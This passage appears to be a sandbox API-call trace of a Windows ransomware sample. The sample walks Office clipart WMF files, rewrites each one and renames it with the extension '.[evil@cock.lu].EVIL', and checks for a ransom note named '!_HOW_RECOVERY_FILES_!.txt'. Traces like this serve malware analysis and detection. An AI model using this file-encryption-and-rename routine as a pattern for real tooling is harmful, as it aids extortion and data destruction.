Office\\root\\CLIPART\\PUB60COR\\J0187849.WMF") returned 0x45 [0150.238] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187849.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187849.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0150.240] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1d94, lpOverlapped=0x0) returned 1 [0150.250] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.250] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.250] _errno () returned 0x84b1160840 [0150.250] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.250] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x1da0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1da0, lpOverlapped=0x0) returned 1 [0150.250] CloseHandle (hObject=0x1a8) returned 1 [0150.250] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187849.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0150.251] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0150.251] __uncaught_exception () returned 0x84b1160800 [0150.251] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0150.251] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187849.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187849.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187849.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187849.wmf.[evil@cock.lu].evil")) returned 1 [0150.252] ??_V@YAXPEAX@Z () returned 0x1 [0150.254] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187849.WMF", dwFileAttributes=0x200) returned 0 [0150.254] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0150.254] wcsstr (_Str="J0187851.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0150.254] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187851.WMF") returned 69 [0150.254] wcscmp (_String1="J0187851.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0150.254] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0187851.WMF") returned 0x0 [0150.254] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187851.WMF") returned 0x45 [0150.255] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187851.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187851.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0150.256] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x221c, lpOverlapped=0x0) returned 1 [0150.266] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.266] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.266] _errno () returned 0x84b1160840 [0150.266] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.266] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x2220, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2220, lpOverlapped=0x0) returned 1 [0150.266] CloseHandle (hObject=0x1a8) returned 1 [0150.266] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187851.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0150.266] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0150.266] __uncaught_exception () returned 0x84b1160800 [0150.266] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0150.267] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187851.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187851.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187851.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187851.wmf.[evil@cock.lu].evil")) returned 1 [0150.267] ??_V@YAXPEAX@Z () returned 0x1 [0150.270] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187851.WMF", dwFileAttributes=0x200) returned 0 [0150.270] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0150.270] wcsstr (_Str="J0187859.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0150.270] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187859.WMF") returned 69 [0150.270] wcscmp (_String1="J0187859.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0150.270] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0187859.WMF") returned 0x0 [0150.270] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187859.WMF") returned 0x45 [0150.270] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187859.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187859.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0150.272] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xaac, lpOverlapped=0x0) returned 1 [0150.274] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.274] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.275] _errno () returned 0x84b1160840 [0150.275] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.275] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0xac0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xac0, lpOverlapped=0x0) returned 1 [0150.275] CloseHandle (hObject=0x1a8) returned 1 [0150.275] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187859.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0150.275] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0150.275] __uncaught_exception () returned 0x84b1160800 [0150.275] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0150.275] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187859.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187859.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187859.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187859.wmf.[evil@cock.lu].evil")) returned 1 [0150.276] ??_V@YAXPEAX@Z () returned 0x1 [0150.279] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187859.WMF", dwFileAttributes=0x200) returned 0 [0150.279] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0150.279] wcsstr (_Str="J0187861.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0150.279] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187861.WMF") returned 69 [0150.279] wcscmp (_String1="J0187861.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0150.279] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0187861.WMF") returned 0x0 [0150.279] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187861.WMF") returned 0x45 [0150.279] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187861.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187861.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0150.281] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2394, lpOverlapped=0x0) returned 1 [0150.287] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.287] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.287] _errno () returned 0x84b1160840 [0150.287] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.288] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x23a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x23a0, lpOverlapped=0x0) returned 1 [0150.288] CloseHandle (hObject=0x1a8) returned 1 [0150.288] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187861.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0150.288] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0150.288] __uncaught_exception () returned 0x84b1160800 [0150.288] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0150.288] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187861.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187861.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187861.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187861.wmf.[evil@cock.lu].evil")) returned 1 [0150.289] ??_V@YAXPEAX@Z () returned 0x1 [0150.293] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187861.WMF", dwFileAttributes=0x200) returned 0 [0150.293] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0150.293] wcsstr (_Str="J0187863.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0150.293] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187863.WMF") returned 69 [0150.293] wcscmp (_String1="J0187863.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0150.293] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0187863.WMF") returned 0x0 [0150.293] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187863.WMF") returned 0x45 [0150.293] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187863.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187863.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0150.295] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2a44, lpOverlapped=0x0) returned 1 [0150.305] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.305] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.305] _errno () returned 0x84b1160840 [0150.305] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.306] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x2a60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2a60, lpOverlapped=0x0) returned 1 [0150.306] CloseHandle (hObject=0x1a8) returned 1 [0150.306] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187863.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0150.306] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0150.306] __uncaught_exception () returned 0x84b1160800 [0150.306] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0150.306] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187863.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187863.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187863.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187863.wmf.[evil@cock.lu].evil")) returned 1 [0150.307] ??_V@YAXPEAX@Z () returned 0x1 [0150.311] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187863.WMF", dwFileAttributes=0x200) returned 0 [0150.311] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0150.311] wcsstr (_Str="J0187881.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0150.311] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187881.WMF") returned 69 [0150.311] wcscmp (_String1="J0187881.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0150.311] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0187881.WMF") returned 0x0 [0150.311] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187881.WMF") returned 0x45 [0150.311] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187881.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187881.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0150.314] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1258, lpOverlapped=0x0) returned 1 [0150.322] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.322] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.322] _errno () returned 0x84b1160840 [0150.322] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.322] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x1260, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1260, lpOverlapped=0x0) returned 1 [0150.322] CloseHandle (hObject=0x1a8) returned 1 [0150.322] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187881.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0150.323] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0150.323] __uncaught_exception () returned 0x84b1160800 [0150.323] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0150.323] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187881.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187881.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187881.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187881.wmf.[evil@cock.lu].evil")) returned 1 [0150.325] ??_V@YAXPEAX@Z () returned 0x1 [0150.328] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187881.WMF", dwFileAttributes=0x200) returned 0 [0150.329] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0150.330] wcsstr (_Str="J0187883.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0150.330] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187883.WMF") returned 69 [0150.330] wcscmp (_String1="J0187883.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0150.330] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0187883.WMF") returned 0x0 [0150.330] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187883.WMF") returned 0x45 [0150.330] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187883.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187883.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0150.333] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x834, lpOverlapped=0x0) returned 1 [0150.404] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.404] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.404] _errno () returned 0x84b1160840 [0150.404] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.404] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x840, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x840, lpOverlapped=0x0) returned 1 [0150.404] CloseHandle (hObject=0x1a8) returned 1 [0150.405] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187883.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0150.405] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0150.405] __uncaught_exception () returned 0x84b1160800 [0150.405] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0150.405] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187883.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187883.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187883.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187883.wmf.[evil@cock.lu].evil")) returned 1 [0150.411] ??_V@YAXPEAX@Z () returned 0x1 [0150.414] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187883.WMF", dwFileAttributes=0x200) returned 0 [0150.414] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0150.415] wcsstr (_Str="J0187893.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0150.415] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187893.WMF") returned 69 [0150.415] wcscmp (_String1="J0187893.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0150.415] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0187893.WMF") returned 0x0 [0150.415] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187893.WMF") returned 0x45 [0150.415] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187893.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187893.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0150.417] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x15f4, lpOverlapped=0x0) returned 1 [0150.422] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.422] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.422] _errno () returned 0x84b1160840 [0150.422] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.422] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x1600, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1600, lpOverlapped=0x0) returned 1 [0150.422] CloseHandle (hObject=0x1a8) returned 1 [0150.422] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187893.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0150.422] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0150.422] __uncaught_exception () returned 0x84b1160800 [0150.422] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0150.423] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187893.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187893.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187893.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187893.wmf.[evil@cock.lu].evil")) returned 1 [0150.424] ??_V@YAXPEAX@Z () returned 0x1 [0150.427] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187893.WMF", dwFileAttributes=0x200) returned 0 [0150.428] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0150.428] wcsstr (_Str="J0187895.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0150.428] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187895.WMF") returned 69 [0150.428] wcscmp (_String1="J0187895.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0150.428] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0187895.WMF") returned 0x0 [0150.428] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187895.WMF") returned 0x45 [0150.428] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187895.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187895.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0150.430] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: 